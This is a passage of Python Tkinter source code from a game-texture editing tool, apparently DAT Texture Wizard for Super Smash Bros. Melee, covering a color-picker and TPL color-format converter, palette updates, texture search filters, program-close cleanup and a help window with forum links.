for frame in [ self.originalColor, self.currentRgbDisplay ]:
frame.pack()
frame.pack_propagate( False )
frame.bind( '<1>', self.pickRGB )
frame.winfo_children()[0].bind( '<1>', self.pickRGB )
blackCurtain = Tk.Frame( curtainFrame, bg='black', width=25, height=50 )
blackCurtain.pack( side='left' )
curtainFrame.pack( padx=5, pady=4 )
curtainFrame.pack_propagate( False )
for frame in curtainFrame.winfo_children(): frame.pack_propagate( False )
# Alpha Channel
ttk.Label( mainFrame, text='Choose the Alpha Channel value:' ).pack( anchor='w', padx=16, pady=4 )
alphaRowFrame = Tk.Frame( mainFrame )
self.alphaEntry = ttk.Entry( alphaRowFrame, width=3 )
self.alphaEntry.pack( side='left', padx=4 )
self.alphaEntry.bind( '<KeyRelease>', self.alphaUpdated )
self.alphaSlider = ttk.Scale( alphaRowFrame, orient='horizontal', from_=0, to=255, length=260, command=self.alphaUpdated )
self.alphaSlider.pack( side='left' , padx=4 )
alphaRowFrame.pack( padx=5, pady=4 )
# Color Value Conversions
ttk.Label( mainFrame, text='Color Space Comparisons:' ).pack( anchor='w', padx=16, pady=4 )
colorEntryFieldsFrame = Tk.Frame( mainFrame )
# RGBA (decimal and hex forms)
ttk.Label( colorEntryFieldsFrame, text='RGBA:' ).grid( column=0, row=0, padx=5 )
self.rgbaStringVar = Tk.StringVar()
self.rgbaEntry = ttk.Entry( colorEntryFieldsFrame, textvariable=self.rgbaStringVar, width=16, justify='center' )
self.rgbaEntry.grid( column=1, row=0, padx=5 )
self.rgbaEntry.bind( '<KeyRelease>', self.rgbaEntryUpdated )
ttk.Label( colorEntryFieldsFrame, text='RGBA Hex:' ).grid( column=2, row=0, padx=5, pady=5 )
self.hexColorStringVar = Tk.StringVar()
self.rgbaHexEntry = ttk.Entry( colorEntryFieldsFrame, textvariable=self.hexColorStringVar, width=10, justify='center' )
self.rgbaHexEntry.grid( column=3, row=0, padx=5 )
self.rgbaHexEntry.bind( '<KeyRelease>', self.hexEntryUpdated )
# TPL Formats
ttk.Label( colorEntryFieldsFrame, text='TPL Format:' ).grid( column=0, row=1, padx=5 )
self.tplFormat = Tk.StringVar()
if 'Palette' in self.title: # Limit the selection of formats to just those used for palettes.
formatList = userFriendlyFormatList[3:-4]
else: formatList = userFriendlyFormatList[:-4]
self.tplFormat.set( formatList[defaultTplFormat] )
self.tplFormatOptionMenu = ttk.OptionMenu( colorEntryFieldsFrame, self.tplFormat, formatList[defaultTplFormat], *formatList, command=self.updateColorDisplays )
self.tplFormatOptionMenu.grid( column=1, row=1, padx=5, pady=5 )
if 'Palette' in self.title: self.tplFormatOptionMenu['state'] = 'disabled'
self.tplFormatStringVar = Tk.StringVar()
self.tplFormatEntry = ttk.Entry( colorEntryFieldsFrame, textvariable=self.tplFormatStringVar, width=13, justify='center' )
self.tplFormatEntry.grid( column=2, columnspan=2, row=1, padx=5, sticky='w' )
self.tplFormatEntry.bind( '<KeyRelease>', self.tplEntryUpdated )
colorEntryFieldsFrame.pack( padx=5, pady=4 )
self.updateColorDisplays( updateImage=False )
#self.alphaSlider.set( self.currentRGBA[-1] )
# Buttons! For use when this isn't just a comparison tool, but being used as a color picker to replace a value in a game/file
if self.title != 'Color Converter':
buttonsFrame = Tk.Frame( mainFrame )
ttk.Button( buttonsFrame, text='Submit', command=self.submit ).pack( side='left', ipadx=4, padx=20 )
ttk.Button( buttonsFrame, text='Cancel', command=self.cancel ).pack( side='left', ipadx=4, padx=20 )
buttonsFrame.pack( pady=8 )
mainFrame.pack()
self.updateEntryBorders( None )
self.window.bind( '<FocusIn>', self.updateEntryBorders ) # Allows for switching between multiple open windows to move the highlighting around
def updateEntryBorders( self, event ): # Updates the border color of palette entries to indicate whether they're selected
if 'Palette' in self.title:
# If any items are currently selected, change their border color back to normal
for item in Gui.paletteCanvas.find_withtag( 'selected' ):
Gui.paletteCanvas.itemconfig( item, fill='black' )
Gui.paletteCanvas.dtag( item, 'selected' ) # Removes this tag from the canvas item
# Use the paletteEntryOffset tag to locate the border item (getting its canvas ID)
if self.datDataOffsets != ():
borderIids = Gui.paletteCanvas.find_withtag( 't'+str(self.datDataOffsets[2]) )
if borderIids:
Gui.paletteCanvas.itemconfig( borderIids[0], fill=Gui.paletteCanvas.entryBorderColor, tags=('selected', 't'+str(self.datDataOffsets[2])) )
def updateColorDisplays( self, updateImage=True, setAlphaEntry=True ): # Updates the visual representation, alpha value/slider, and colorspace Entry values
currentTplFormat = int( self.tplFormat.get().split()[0][1:] )
if currentTplFormat in [ 0, 1, 4 ]: alphaSupported = False
else: alphaSupported = True
# Combine the newly selected color with the default background color, to simulate alpha on the colored frame (since Frames don't support transparency)
newColors = []
alphaBlending = round( self.currentRGBA[-1] / 255.0, 2 )
for i, color in enumerate( self.nativeBgColor ):
newColors.append( int(round( (alphaBlending * self.currentRGBA[i]) + (1-alphaBlending) * color )) )
currentColorLabel = self.currentRgbDisplay.winfo_children()[0]
currentColorBg = rgb2hex( newColors )
self.currentRgbDisplay['bg'] = currentColorBg
currentColorLabel['bg'] = currentColorBg
if getLuminance( currentColorBg + 'ff' ) > 127: currentColorLabel['fg'] = 'black'
else: currentColorLabel['fg'] = 'white'
# Set the alpha components of the GUI
self.preventNextSliderCallback = True # Prevents an infinite loop where the programmatic setting of the slider causes another update for this function
self.alphaEntry['state'] = 'normal'
self.alphaSlider.state(['!disabled'])
currentAlphaLevel = self.currentRGBA[-1]
if not alphaSupported: # These formats do not support alpha; max the alpha channel display and disable the widgets
self.alphaEntry.delete( 0, 'end' )
self.alphaEntry.insert( 0, '255' )
self.alphaSlider.set( 255 )
self.alphaEntry['state'] = 'disabled'
self.alphaSlider.state(['disabled'])
elif setAlphaEntry: # Prevents moving the cursor position if the user is typing into this field
self.alphaEntry.delete( 0, 'end' )
self.alphaEntry.insert( 0, str(currentAlphaLevel) ) #.lstrip('0')
self.alphaSlider.set( currentAlphaLevel )
else: self.alphaSlider.set( currentAlphaLevel ) # User entered a value into the alphaEntry; don't modify that
# Set the RGBA fields
if alphaSupported:
self.rgbaStringVar.set( ', '.join([ str(channel) for channel in self.currentRGBA ]) )
self.hexColorStringVar.set( self.currentHexColor )
else:
self.rgbaStringVar.set( ', '.join([ str(channel) for channel in self.currentRGBA[:-1] ]) )
self.hexColorStringVar.set( self.currentHexColor[:-2] )
# Set the TPL Entry field
self.tplHex = tplEncoder.encodeColor( currentTplFormat, self.currentRGBA )
if currentTplFormat < 6:
self.tplFormatStringVar.set( self.tplHex.upper() )
elif currentTplFormat == 6: # In this case, the value will actually be a tuple of the color parts
self.tplFormatStringVar.set( self.tplHex[0].upper() + ' | ' + self.tplHex[1].upper() )
else: self.tplFormatStringVar.set( 'N/A' )
if 'Palette' in self.title and updateImage:
# Validate the encoded color
if len( self.tplHex ) != 4 or not validHex( self.tplHex ):
msg( 'The newly generated color was not two bytes!' )
else:
self.updateTexture( self.tplHex )
def pickRGB( self, event ):
try: rgbValues, hexColor = askcolor( initialcolor='#'+self.currentHexColor[:-2], parent=self.window )
except: rgbValues, hexColor = '', ''
if rgbValues:
# Get the current alpha value, and combine it with the colors chosen above.
currentAlphaLevel = int( round(self.alphaSlider.get()) )
self.currentRGBA = ( rgbValues[0], rgbValues[1], rgbValues[2], currentAlphaLevel )
self.currentHexColor = hexColor.replace('#', '').upper() + "{0:0{1}X}".format( currentAlphaLevel, 2 )
self.updateColorDisplays()
def alphaUpdated( self, event ):
if self.preventNextSliderCallback:
self.preventNextSliderCallback = False
return
else:
setAlphaEntry = True
if isinstance( event, str ): newAlphaValue = int( float(event) ) # Means
else:
newAlphaValue = int( round(float( event.widget.get() )) )
setAlphaEntry = False
self.currentRGBA = self.currentRGBA[:-1] + ( newAlphaValue, )
self.currentHexColor = self.currentHexColor[:-2] + "{0:0{1}X}".format( newAlphaValue, 2 )
self.updateColorDisplays( setAlphaEntry=setAlphaEntry )
def rgbaEntryUpdated( self, event ):
# Parse and validate the input
channels = event.widget.get().split(',')
channelsList = []
parsingError = False
for channelValue in channels:
try:
newInt = int( float(channelValue) )
if newInt > -1 and newInt < 256: channelsList.append( newInt )
except:
parsingError = True
break
else: # Got through the above loop with no break. Still got one more check.
if len( channelsList ) != 4:
parsingError = True
if parsingError:
if event.keysym == 'Return': # User hit the "Enter" key in a confused attempt to force an update
msg( 'The input should be in the form, "r, g, b, a", where each value is within the range of 0 - 255.', 'Invalid input or formatting.' )
else: # Everything checks out, update the color and GUI
self.currentRGBA = tuple( channelsList )
self.currentHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in self.currentRGBA ] )
self.updateColorDisplays()
def hexEntryUpdated( self, event ):
# Parse and validate the input
inputStr = event.widget.get()
channelsList, parsingError = hex2rgb( inputStr )
if parsingError:
if event.keysym == 'Return': # User hit the "Enter" key in a confused attempt to force an update
msg( 'The input should be in the form, "RRGGBBAA", where each value is within the hexadecimal range of 00 - FF.', 'Invalid input or formatting.' )
else: # Everything checks out, update the color and GUI
self.currentRGBA = tuple( channelsList )
self.currentHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in self.currentRGBA ] )
self.updateColorDisplays()
def tplEntryUpdated( self, event ):
tplHex = self.tplFormatStringVar.get().replace('0x', '').replace('|', '')
nibbleCount = { 0:1, 1:2, 2:2, 3:4, 4:4, 5:4, 6:8, 8:1, 9:2, 10:4, 14:1 } # How many characters should be present in the string
currentTplFormat = int( self.tplFormat.get().split()[0][1:] )
if len( tplHex ) == nibbleCount[currentTplFormat] and validHex( tplHex ):
self.currentRGBA = tplDecoder.decodeColor( currentTplFormat, tplHex )
self.currentHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in self.currentRGBA ] )
self.updateColorDisplays()
def restoreColor( self, event ):
item = event.widget.find_closest( event.x, event.y )[0]
self.currentRGBA = self.itemColors[item]
self.currentHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in self.currentRGBA ] )
self.updateColorDisplays()
def updateRecentColors( self ):
# If the current color is already in the list, remove it, and add the color to the start of the list.
for i, colorTuple in enumerate( self.recentColors ):
if colorTuple == self.currentRGBA:
self.recentColors.pop( i )
break
self.recentColors.append( self.currentRGBA )
# Keep the list under a certain size
while len( self.recentColors ) > 24:
self.recentColors.pop( 0 )
def updateTexture( self, paletteEntryHex ): # This function only used when updating palette colors
if self.datDataOffsets != ():
if paletteEntryHex == self.lastUpdatedColor:
return
# Replace the color in the image or palette data
_, _, paletteEntryOffset, imageDataOffset = self.datDataOffsets
globalDatFile.updateData( paletteEntryOffset, bytearray.fromhex(paletteEntryHex), 'Palette entry modified', trackChange=False )
# Load the new data for the updated texture and display it
width, height, imageType = globalDatFile.structs[imageDataOffset].getAttributes()[1:4]
imageDataLength = getImageDataLength( width, height, imageType )
loadSuccessful = renderTextureData( imageDataOffset, width, height, imageType, imageDataLength, allowImageDumping=False )
if not loadSuccessful:
msg( 'There was an error rendering the new texture data.' )
return
drawTextureToMainDisplay( imageDataOffset )
populatePaletteTab( imageDataOffset, imageDataLength, imageType )
self.lastUpdatedColor = paletteEntryHex
updateProgramStatus( 'Palette Color Updated' )
def submit( self ):
self.updateRecentColors()
if 'Palette' in self.title:
globalDatFile.unsavedChanges.append( 'Palette color ' + self.initialColor + ' changed to ' + self.currentHexColor + '.' )
self.close()
def cancel( self ):
# If the window was being used to update a palette color, revert the color back to the original
if 'Palette' in self.title:
self.updateTexture( self.datDataOffsets[1] )
self.currentHexColor = self.initialColor
self.close()
def close( self ):
self.window.destroy()
if self.windowId:
del self.windows[self.windowId]
#================================#
# ~ ~ GUI Specific Functions ~ ~ #
#================================#
def cmsg( message, title='', align='center', buttons=None, makeModal=False ):
CopyableMessageWindow( Gui.root, message, title, align, buttons, makeModal )
def onFileTreeDoubleClick( event ):
clickedRegion = Gui.isoFileTree.identify_region( event.x, event.y ) # Possible returns: 'heading', 'tree', 'cell', 'nothing'
if clickedRegion == 'tree' or clickedRegion == 'cell': # 'tree' = the first default/navigation column, 'cell' should be any standard column/row
iid = Gui.isoFileTree.identify( 'item', event.x, event.y )
entity = Gui.isoFileTree.item( iid, 'values' )[1]
if entity == 'folder': # Toggle the folder open or closed
Gui.isoFileTree.item( iid, open=not Gui.isoFileTree.item( iid, 'open' ) )
else: loadFileWithinDisc( iid )
return 'break' # Returning 'break' is necessary to prevent any further propagation of the click event within the GUI
# def onStructureTreeDoubleClick( event ):
# clickedRegion = Gui.fileStructureTree.identify_region( event.x, event.y ) # Possible returns: 'heading', 'tree', 'cell', 'nothing'
# if clickedRegion == 'tree' or clickedRegion == 'cell': # 'tree' = the first default/navigation column, 'cell' should be any standard column/row
# iid = Gui.fileStructureTree.identify( 'item', event.x, event.y )
# # If the struct has children, toggle the 'folder' view open or closed
# if Gui.fileStructureTree.get_children():
# print 'toggling', iid
# Gui.fileStructureTree.item( iid, open=not Gui.fileStructureTree.item( iid, 'open' ) )
# return 'break' # Returning 'break' is necessary to prevent any further propagation of the click event within the GUI
class DataSpaceModifierWindow( object ):
def __init__( self, master, mode ):
window = self.window = Tk.Toplevel( master )
window.title( 'Data Space Modifier' )
window.resizable( width=False, height=False )
window.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox widget.
window.wm_attributes( '-topmost', 1 ) # Makes window stay topmost to other program windows.
# Calculate the spawning position of the new window
rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
window.geometry( '+' + str(rootDistanceFromScreenLeft + 200) + '+' + str(rootDistanceFromScreenTop + 140) )
if mode == 'collapse':
usageText = ( 'This feature will remove/delete data from the file, starting at the given offset. '
'This includes removal of pointers within, or pointing to, the affected area. As well as removal of '
'root/reference nodes, and strings within the string table, if associated with the affected area. ' )
else:
usageText = ( 'This feature will increase the amount of file/data space at the given offset. '
'This does not create a new structure; the existing structure at the given offset is merely extended. ' )
usageText += 'This feature may adjust the amount, in order to preserve alignment for other file structures. '
usageText += '\n\nPlease note that this is an experimental feature. It is advised to make a back-up copy of your files before use.'
ttk.Label( window, text=usageText, wraplength=400 ).pack( padx=15, pady=5 )
entryFrame = ttk.Frame( window )
ttk.Label( entryFrame, text='Offset:' ).grid( column=0, row=0, padx=7, pady=5 )
self.offsetEntry = ttk.Entry( entryFrame, width=9 )
self.offsetEntry.grid( column=1, row=0, padx=7, pady=5 )
ttk.Label( entryFrame, text='Amount:' ).grid( column=0, row=1, padx=7, pady=5 )
self.amountEntry = ttk.Entry( entryFrame, width=9 )
self.amountEntry.grid( column=1, row=1, padx=7, pady=5 )
entryFrame.pack( pady=5 )
# Add the Submit/Cancel buttons
buttonsFrame = ttk.Frame( window )
self.okButton = ttk.Button( buttonsFrame, text='Submit', command=self.submit )
self.okButton.pack( side='left', padx=10 )
ttk.Button( buttonsFrame, text='Cancel', command=self.cancel ).pack( side='left', padx=10 )
window.protocol( 'WM_DELETE_WINDOW', self.cancel ) # Overrides the 'X' close button.
buttonsFrame.pack( pady=7 )
# Move focus to this window (for keyboard control), and pause execution of the main window/thread until this window is closed.
self.offsetEntry.focus_set()
master.wait_window( window ) # Pauses execution of the calling function until this window is closed.
def submit( self, event='' ):
self.offset = self.offsetEntry.get().strip()
self.amount = self.amountEntry.get().strip()
self.window.destroy()
def cancel( self, event='' ):
self.offset = ''
self.amount = ''
self.window.destroy()
class popupDropdownWindow( object ): # todo: move to standardized common modules file
def __init__( self, master, message='', title='', dropdownOptions=[], width=100 ):
top = self.top = Tk.Toplevel( master )
top.title( title )
top.resizable( width=False, height=False )
top.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox widget.
top.wm_attributes( '-topmost', 1 ) # Makes window stay topmost to other program windows.
# Calculate the spawning position of the new window
rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
top.geometry( '+' + str(rootDistanceFromScreenLeft + 200) + '+' + str(rootDistanceFromScreenTop + 140) )
# Add a message for the user and the Drop-down widget for user input
ttk.Label( top, text=message ).pack( pady=5 )
self.dropDownValue = Tk.StringVar()
self.dropdown = ttk.OptionMenu( top, self.dropDownValue, dropdownOptions[0], *dropdownOptions )
self.dropdown.pack( padx=5, pady=6 )
# Add the OK/Cancel buttons
buttonsFrame = ttk.Frame( top )
self.okButton = ttk.Button( buttonsFrame, text='Ok', command=self.cleanup )
self.okButton.pack( side='left', padx=10 )
ttk.Button( buttonsFrame, text='Cancel', command=self.cancel ).pack( side='left', padx=10 )
top.protocol( 'WM_DELETE_WINDOW', self.cancel ) # Overrides the 'X' close button.
buttonsFrame.pack( pady=7 )
# Move focus to this window (for keyboard control), and pause execution of the main window/thread until this window is closed.
self.dropdown.focus_set()
master.wait_window( top ) # Pauses execution of the calling function until this window is closed.
def cleanup( self, event='' ):
self.top.destroy()
def cancel( self, event='' ):
self.dropDownValue.set( '' )
self.top.destroy()
def selectAll( event ): # Adds bindings for normal CTRL-A functionality.
if event.widget.winfo_class() == 'Text': event.widget.tag_add('sel', '1.0', 'end')
elif event.widget.winfo_class() == 'TEntry': event.widget.selection_range(0, 'end')
def restoreEditedEntries( editedEntries ):
# Change the background color of any edited entry widgets (Image Data Headers, Texture Struct properties, etc.) back to white.
for widget in editedEntries:
if widget.winfo_exists():
if widget.__class__ == HexEditDropdown: # This is a ttk widget, which changes background color using a style
widget.configure( style='TMenubutton' )
else:
defaultSystemBgColor = getattr( widget, 'defaultSystemBgColor', None )
if defaultSystemBgColor: # If it has this property, it's a DisguisedEntry (used for the Game ID entry field)
widget.configure( background=defaultSystemBgColor )
else: widget.configure( background="white" )
editedEntries = []
def onProgramClose():
global programClosing
# Make sure there aren't any changes pending to be saved (warns user if there are).
if globalDatFile and not globalDatFile.noChangesToBeSaved( programClosing ): return
elif globalBannerFile and not globalBannerFile.noChangesToBeSaved( programClosing ): return
elif not noDiscChangesToBeSaved(): return
programClosing = True
Gui.root.aboutWindow = None # Ends the infinite loop the aboutWindow generates.
# Shut down other decoding processes or threads that may be running
#cancelCurrentRenders() # Should be enabled if multiprocessing is enabled
# Check if the texture dumps should be deleted.
if generalBoolSettings['deleteImageDumpsOnExit'].get() and os.path.exists( texDumpsFolder ):
for the_file in os.listdir(texDumpsFolder):
file_path = os.path.join(texDumpsFolder, the_file)
try:
if os.path.isfile(file_path): os.remove(file_path)
elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception as e: msg( e )
# Delete any temporary files that may be left over, only if they are not in use (may be used by a hex editor if it's open)!
try: # Precaution. Really don't want this function to fail!
hexEditorPath = settings.get('General Settings', 'hexEditorPath')
tempFolder = scriptHomeFolder + '\\bin\\tempFiles\\'
if programClosing and hexEditorPath and os.path.exists( tempFolder ):
hexProgramName = os.path.basename( hexEditorPath )
for process in psutil.process_iter():
if process.name().lower() == hexProgramName.lower(): break
else: # Loop above didn't break; the hex editor doesn't appear to be running
try: shutil.rmtree( tempFolder )
except: print 'Unable to delete the hex temp folder for an unknown reason.'
except: print 'unexplained error while checking processes for a running hex editor'
# Close the program.
if programClosing: # If a DAT is being scanned, let that loop finish its current iteration and then close the program, to avoid errors.
Gui.root.destroy() # Stops the GUI's mainloop and destroys all widgets: https://stackoverflow.com/a/42928131/8481154
def setImageFilters(): #todo should be a class
if Gui.root.imageFiltersWindow != None: Gui.root.imageFiltersWindow.deiconify()
else:
loadSettings() # Persistent storage from settings.ini
imageFiltersWindow = Tk.Toplevel()
imageFiltersWindow.title('Texture Filters')
imageFiltersWindow.attributes('-toolwindow', 1) # Makes window framing small, like a toolbox/widget.
# Calculate the spawning position of the new window
rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
imageFiltersWindow.geometry( '+' + str(rootDistanceFromScreenLeft + 70) + '+' + str(rootDistanceFromScreenTop + 70) )
Gui.root.imageFiltersWindow = imageFiltersWindow
mainFrame = Tk.Frame(imageFiltersWindow)
ttk.Label(mainFrame, text='Only show textures that meet this criteria:').pack(padx=10, pady=4)
widthTuple = imageFilters['widthFilter']
row1 = Tk.Frame(mainFrame)
ttk.Label(row1, text='Width: ').pack(side='left')
widthComparator = Tk.StringVar()
widthComparator.set( widthTuple[0] )
Tk.OptionMenu(row1, widthComparator, '<', '<=', '=', '>', '>=').pack(side='left')
widthValue = Tk.StringVar()
widthValue.set( widthTuple[1] )
Tk.Entry(row1, textvariable=widthValue, width=6).pack(side='left')
row1.pack(padx=10, pady=4)
heightTuple = imageFilters['heightFilter']
row2 = Tk.Frame(mainFrame)
ttk.Label(row2, text='Height: ').pack(side='left')
heightComparator = Tk.StringVar()
heightComparator.set( heightTuple[0] )
Tk.OptionMenu(row2, heightComparator, '<', '<=', '=', '>', '>=').pack(side='left')
heightValue = Tk.StringVar()
heightValue.set( heightTuple[1] )
Tk.Entry(row2, textvariable=heightValue, width=6).pack(side='left')
row2.pack(padx=10, pady=4)
aspectRatioTuple = imageFilters['aspectRatioFilter']
row3 = Tk.Frame(mainFrame)
ttk.Label(row3, text='Aspect Ratio: ').pack(side='left')
aspectRatioComparator = Tk.StringVar()
aspectRatioComparator.set( aspectRatioTuple[0] )
Tk.OptionMenu(row3, aspectRatioComparator, '<', '<=', '=', '>', '>=').pack(side='left')
aspectRatioValue = Tk.StringVar()
aspectRatioValue.set( aspectRatioTuple[1] )
Tk.Entry(row3, textvariable=aspectRatioValue, width=6).pack(side='left')
row3.pack(padx=10, pady=4)
imageTypeTuple = imageFilters['imageTypeFilter']
row4 = Tk.Frame(mainFrame)
ttk.Label(row4, text='Texture Type: ').pack(side='left')
imageTypeComparator = Tk.StringVar()
imageTypeComparator.set( imageTypeTuple[0] )
Tk.OptionMenu(row4, imageTypeComparator, '<', '<=', '=', '>', '>=').pack(side='left')
imageTypeValue = Tk.StringVar()
imageTypeValue.set( imageTypeTuple[1] )
Tk.Entry(row4, textvariable=imageTypeValue, width=6).pack(side='left')
row4.pack(padx=10, pady=4)
offsetTuple = imageFilters['offsetFilter']
row5 = Tk.Frame(mainFrame)
ttk.Label(row5, text='Offset (location in file): ').pack(side='left')
offsetComparator = Tk.StringVar()
offsetComparator.set( offsetTuple[0] )
Tk.OptionMenu(row5, offsetComparator, '<', '<=', '=', '>', '>=').pack(side='left')
offsetValue = Tk.StringVar()
offsetValue.set( offsetTuple[1] )
Tk.Entry(row5, textvariable=offsetValue, width=10).pack(side='left')
row5.pack(padx=10, pady=4)
# Button functions
def close():
Gui.root.imageFiltersWindow.destroy()
Gui.root.imageFiltersWindow = None
imageFiltersWindow.protocol('WM_DELETE_WINDOW', close) # Overrides the 'X' close button.
def save():
if not os.path.exists( settingsFile ):
msg( 'Unable to find the settings file. Reloading this window should recreate it.' )
return False
unsavedSettings = []
with open( settingsFile, 'w') as theSettingsFile:
# For each setting, if the value is a number or blank, update the value and its comparitor in the program and settings file.
width = widthValue.get().replace(',', '')
if not isNaN(width) or width == '':
imageFilters['widthFilter'] = ( widthComparator.get(), width )
settings.set( 'Texture Search Filters', 'widthFilter', widthComparator.get() + '|' + width )
else: unsavedSettings.append( 'width' )
height = heightValue.get().replace(',', '')
if not isNaN(height) or height == '':
imageFilters['heightFilter'] = ( heightComparator.get(), height )
settings.set( 'Texture Search Filters', 'heightFilter', heightComparator.get() + '|' + height )
else: unsavedSettings.append( 'height' )
aspectRatio = aspectRatioValue.get()
try:
# Make sure that the aspect ratio can be converted to a number.
if ':' in aspectRatio:
numerator, denomenator = aspectRatio.split(':')
convertedAspectRatio = float(numerator) / float(denomenator)
elif '/' in aspectRatio:
numerator, denomenator = aspectRatio.split('/')
convertedAspectRatio = float(numerator) / float(denomenator)
elif aspectRatio != '': convertedAspectRatio = float(aspectRatio)
if aspectRatio == '' or not isNaN( convertedAspectRatio ):
imageFilters['aspectRatioFilter'] = ( aspectRatioComparator.get(), aspectRatio )
settings.set( 'Texture Search Filters', 'aspectRatioFilter', aspectRatioComparator.get() + '|' + aspectRatio )
else: unsavedSettings.append( 'aspect ratio' )
except:
unsavedSettings.append( 'aspect ratio' )
imageType = imageTypeValue.get().replace('_', '')
if not isNaN(imageType) or imageType == '':
imageFilters['imageTypeFilter'] = ( imageTypeComparator.get(), imageType ) # str(int()) is in case the value was in hex
settings.set( 'Texture Search Filters', 'imageTypeFilter', imageTypeComparator.get() + '|' + imageType )
else: unsavedSettings.append( 'texture type' )
offset = offsetValue.get().replace(',', '')
if (validOffset(offset) and not isNaN(int(offset,16))) or offset == '':
imageFilters['offsetFilter'] = ( offsetComparator.get(), offset )
settings.set( 'Texture Search Filters', 'offsetFilter', offsetComparator.get() + '|' + offset )
else: unsavedSettings.append( 'offset' )
settings.write( theSettingsFile )
if unsavedSettings != []:
msg('The filters for ' + grammarfyList( unsavedSettings ) + ' could not saved. The entries must be a number or left blank, with the '
'exception of aspect ratio (which may be a number, fraction, float (decimal), or a ratio like "4:3").')
imageFiltersWindow.lift()
return False
else: return True
def saveNclose():
successfullySaved = save()
# If saving doesn't work or the settings file wasn't found, don't close the window, so the settings aren't lost.
if successfullySaved: close()
def saveNreload():
success = save()
if success: # If the settings file wasn't found, don't close the window, so the settings aren't lost.
close()
clearDatTab()
scanDat()
# Switch to the DAT Texture Tree tab
Gui.mainTabFrame.select( Gui.datTab ) # scanDat will now be called by the onMainTabChanged event handler
def clear(): # Set all values back to default.
widthComparator.set( '=' )
widthValue.set( '' )
heightComparator.set( '=' )
heightValue.set( '' )
aspectRatioComparator.set( '=' )
aspectRatioValue.set( '' )
imageTypeComparator.set( '=' )
imageTypeValue.set( '' )
offsetComparator.set( '=' )
offsetValue.set( '' )
# The buttons.
row6 = Tk.Frame( mainFrame, width=200 )
btnFrame = Tk.Frame(row6)
ttk.Button( btnFrame, text='Clear',command=clear ).pack( side='left', padx=5 )
ttk.Button( btnFrame, text='Save', command=saveNclose ).pack( side='right', padx=5 )
btnFrame.pack()
ttk.Button( row6, text='Save and Rescan Textures', command=saveNreload ).pack( fill='x', padx=5, pady=4 )
row6.pack( pady=4 )
mainFrame.pack()
def showHelpWindow():
if Gui.root.helpWindow != None: Gui.root.helpWindow.deiconify()
else:
loadSettings() # Persistent storage from settings.ini
# Define the window
helpWindow = Tk.Toplevel()
helpWindow.title('Help')
helpWindow.attributes('-toolwindow', 1) # Makes window framing small, like a toolbox/widget.
helpWindow.resizable(width=False, height=False)
helpWindow.wm_attributes('-topmost', 1) # Makes window stay topmost (main program still usable).
Gui.root.helpWindow = helpWindow
# Calculate the spawning position of the new window
rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
helpWindow.geometry( '+' + str(rootDistanceFromScreenLeft + 180) + '+' + str(rootDistanceFromScreenTop + 140) )
helpWindow.focus()
mainFrame = Tk.Frame(helpWindow)
# Button functions
def close():
Gui.root.helpWindow.destroy()
Gui.root.helpWindow = None
helpWindow.protocol('WM_DELETE_WINDOW', close) # Overrides the 'X' close button.
def gotoWorkshop( event ): webbrowser.open( 'http://smashboards.com/forums/melee-workshop.271/' )
def gotoOfficialThread( event ): webbrowser.open( 'http://smashboards.com/threads/new-tools-for-texture-hacking.373777/' )
def gotoHowToHackAnyTexture( event ): webbrowser.open( 'http://smashboards.com/threads/how-to-hack-any-texture.388956/' )
def gotoMeleeHacksAndYou( event ): webbrowser.open( 'http://smashboards.com/threads/melee-hacks-and-you-updated-5-21-2015.247119/#post-4917885' )
label = ttk.Label( mainFrame, text='- = The Melee Workshop = -', foreground='#00F', cursor='hand2' )
label.bind( '<1>', gotoWorkshop )
label.pack(pady=4)
gridSection = Tk.Frame( mainFrame ) # These contents are grouped together so they can use the grid geometry manager rather than .pack()
ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=0, columnspan=2 )
label = ttk.Label( gridSection, text='Read Up on Program Usage', foreground='#00F', cursor='hand2' )
label.bind( '<1>', showReadMeFile )
label.grid( column=0, row=1 )
ttk.Label( gridSection, text='For documentation on this program').grid( column=1, row=1 )
ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=2, columnspan=2 )
label = ttk.Label( gridSection, text="DTW's Official Thread", foreground='#00F', cursor='hand2' )
label.bind('<1>', gotoOfficialThread)
label.grid( column=0, row=3 )
ttk.Label( gridSection, text='Questions, feature requests, and other discussion on '
'this program can be posted here').grid( column=1, row=3 )
ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=4, columnspan=2 )
label = ttk.Label( gridSection, text='How to Hack Any Texture', foreground='#00F', cursor='hand2' )
label.bind('<1>', gotoHowToHackAnyTexture)
label.grid( column=0, row=5 )
ttk.Label( gridSection, text="If for some reason your texture doesn't "
"appear in this program, then you can fall back onto this thread").grid( column=1, row=5 )
ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=6, columnspan=2 )
label = ttk.Label( gridSection, text='OP of Melee Hacks and You', foreground='#00F', cursor='hand2' )
label.bind('<1>', gotoMeleeHacksAndYou)
label.grid( column=0, row=7 )
ttk.Label( gridSection, text='The first post in this thread contains many '
'resources on all subjects to help you get started').grid( column=1, row=7 )
ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=8, columnspan=2 )
for label in gridSection.grid_slaves( column=1 ):
label.config( wraplength=220 )
for label in gridSection.winfo_children():
label.grid_configure( ipady=4, padx=7 )
gridSection.pack( padx=4 )
ttk.Label( mainFrame, text='Random Pro-tip: ' + proTips[random.randint( 1, len(proTips) )], wraplength=380 ).pack( padx=4, pady=12 )
mainFrame.pack()
proTips = {
1: ( "Did you know that you can drag-and-drop files directly onto "
"the program icon (the .exe file) or the GUI to open them?" ),
2: ( "There are multiple useful behaviors you can call upon when importing textures:"
"\n- When viewing the contents of a disc on the 'Disc File Tree' tab. The imported "
